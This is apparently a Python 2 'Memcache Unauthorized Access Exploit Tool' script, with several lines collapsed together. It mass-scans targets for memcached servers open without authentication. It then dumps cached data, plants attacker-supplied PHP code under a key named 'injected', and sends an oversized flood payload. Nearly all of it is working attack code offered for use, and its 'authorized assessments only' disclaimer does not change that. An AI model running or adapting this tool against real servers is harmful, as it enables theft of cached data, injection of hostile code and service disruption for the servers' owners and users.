1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161
|
import socket import argparse from threading import Thread, Lock from Queue import Queue
class MemcacheExploit:
    """Probe memcached servers that answer the text protocol without auth.

    Intended for authorized security assessments only: run it solely against
    hosts you own or have explicit permission to test.

    NOTE(review): payloads are plain ``str`` objects handed to
    ``socket.send`` and replies are compared against ``str`` literals, which
    matches Python 2 semantics.

    Attributes:
        timeout: Socket timeout in seconds applied to every connection.
        lock: Serializes the multi-line "found" report printed by workers.
        q: Work queue of ``(ip, port, action)`` tuples consumed by ``worker``.
    """

    def __init__(self, timeout=5):
        self.timeout = timeout
        self.lock = Lock()
        self.q = Queue()

    @staticmethod
    def _split_target(target, default_port=11211):
        """Split ``"host"`` or ``"host:port"`` into ``(host, port)``.

        Raises:
            ValueError: if the host is empty or the port part is not an
                integer (this also rejects entries with several colons).
        """
        host, sep, port_text = target.strip().partition(":")
        if not host:
            raise ValueError("missing host in target")
        if not sep:
            return host, default_port
        return host, int(port_text)

    def _connect(self, ip, port):
        """Return a connected TCP socket; close it if connecting fails."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.settimeout(self.timeout)
            sock.connect((ip, port))
        except Exception:
            # Do not leak the descriptor when the host is unreachable.
            sock.close()
            raise
        return sock

    def check_vulnerable(self, ip, port=11211):
        """Report whether ``ip:port`` answers ``stats`` without auth.

        Sends ``stats`` and reads up to 1024 bytes. The server counts as
        open when the reply contains ``STAT version``; in that case the
        reply is printed under ``self.lock``.

        Returns:
            True if the marker was found, False otherwise. Any error
            (refused, timeout, ...) is treated as "not open" because
            unreachable hosts are the normal case during a scan.
        """
        try:
            s = self._connect(ip, port)
            try:
                s.send("stats\r\n")
                result = s.recv(1024)
            finally:
                s.close()
            if "STAT version" in result:
                with self.lock:
                    print("[+] Memcache Unauthorized: {}:{}".format(ip, port))
                    print("[*] Server Info:\n{}".format(result.strip()))
                return True
        except Exception:
            pass
        return False

    def execute_command(self, ip, port, command):
        """Store the text following a ``php:`` prefix under key ``injected``.

        Nothing is executed by this method itself: it only issues a
        memcached ``set``. A ``command`` without the ``php:`` prefix causes
        the connection to be opened and closed with no data sent.
        Errors are printed, not raised.
        """
        try:
            s = self._connect(ip, port)
            try:
                if command.startswith("php:"):
                    php_code = command[4:]
                    s.send("set injected 0 0 {}\r\n{}\r\n".format(
                        len(php_code), php_code))
                    result = s.recv(1024)
                    if "STORED" in result:
                        print("[+] PHP code injected successfully")
            finally:
                s.close()
        except Exception as e:
            print("[-] Error executing command: {}".format(str(e)))

    def dump_data(self, ip, port):
        """Print the replies to ``stats items``, ``stats slabs`` and
        ``stats cachedump 1 100``.

        Each reply is a single ``recv`` (4096/4096/8192 bytes), so long
        replies may be truncated. Errors are printed, not raised.
        """
        try:
            s = self._connect(ip, port)
            try:
                s.send("stats items\r\n")
                items = s.recv(4096)
                s.send("stats slabs\r\n")
                slabs = s.recv(4096)
                s.send("stats cachedump 1 100\r\n")
                dump = s.recv(8192)
            finally:
                s.close()
            print("[*] Memcache Data Dump from {}:{}".format(ip, port))
            print("\n[+] Items:\n{}".format(items))
            print("\n[+] Slabs:\n{}".format(slabs))
            print("\n[+] Cachedump:\n{}".format(dump))
        except Exception as e:
            print("[-] Error dumping data: {}".format(str(e)))

    def flood_attack(self, ip, port, size=1024):
        """Send one oversized ``gets`` request over TCP and disconnect.

        The payload is an 8-byte prefix followed by ``gets a`` plus
        ``size`` additional ``a`` characters. No reply is read.
        Errors are printed, not raised.
        """
        try:
            payload = "\x00\x01\x00\x00\x00\x01\x00\x00gets a" + "a" * size + "\r\n"
            s = self._connect(ip, port)
            try:
                s.send(payload)
            finally:
                s.close()
            print("[+] Flood payload sent to {}:{}".format(ip, port))
        except Exception as e:
            print("[-] Error in flood attack: {}".format(str(e)))

    def worker(self):
        """Consume ``(ip, port, action)`` jobs from ``self.q`` forever.

        ``check`` runs the probe; ``dump`` runs the probe and, if it
        succeeds, ``dump_data``. ``task_done`` is always called so that
        ``Queue.join`` cannot hang on a failed job.
        """
        while True:
            ip, port, action = self.q.get()
            try:
                if action == "check":
                    self.check_vulnerable(ip, port)
                elif action == "dump":
                    if self.check_vulnerable(ip, port):
                        self.dump_data(ip, port)
            finally:
                self.q.task_done()

    def scan_range(self, targets, threads=10, action="check"):
        """Run ``action`` against every target using daemon worker threads.

        Args:
            targets: Iterable of ``"host"`` or ``"host:port"`` strings;
                entries without a port use 11211.
            threads: Number of worker threads to start.
            action: ``"check"`` or ``"dump"`` (see ``worker``).

        Malformed entries are reported and skipped instead of aborting the
        scan. Blocks until every queued job has been processed.
        """
        for _ in range(threads):
            t = Thread(target=self.worker)
            t.daemon = True
            t.start()

        for target in targets:
            try:
                ip, port = self._split_target(target)
            except ValueError:
                with self.lock:
                    print("[-] Skipping invalid target: {}".format(target))
                continue
            self.q.put((ip, port, action))

        self.q.join()
def main(): parser = argparse.ArgumentParser(description="Memcache Unauthorized Access Exploit Tool") parser.add_argument("-t", "--target", help="Target IP (e.g. 192.168.1.1 or 192.168.1.1:11211)") parser.add_argument("-f", "--file", help="File containing target IPs (one per line)") parser.add_argument("-p", "--port", type=int, default=11211, help="Memcache port (default: 11211)") parser.add_argument("-a", "--action", choices=["check", "dump", "flood", "execute"], default="check", help="Action to perform (default: check)") parser.add_argument("-c", "--command", help="Command to execute (use with --action execute)") parser.add_argument("-T", "--threads", type=int, default=10, help="Number of threads (default: 10)") parser.add_argument("--timeout", type=int, default=5, help="Connection timeout (default: 5)") args = parser.parse_args() exploit = MemcacheExploit(args.timeout) targets = [] if args.file: with open(args.file) as f: targets = [line.strip() for line in f if line.strip()] elif args.target: targets = [args.target] else: parser.print_help() return if args.action == "check": exploit.scan_range(targets, args.threads, "check") elif args.action == "dump": exploit.scan_range(targets, args.threads, "dump") elif args.action == "flood": for target in targets: ip = target.split(":")[0] if ":" in target else target exploit.flood_attack(ip, args.port) elif args.action == "execute" and args.command: for target in targets: ip = target.split(":")[0] if ":" in target else target if exploit.check_vulnerable(ip, args.port): exploit.execute_command(ip, args.port, args.command)
if __name__ == '__main__': main()
|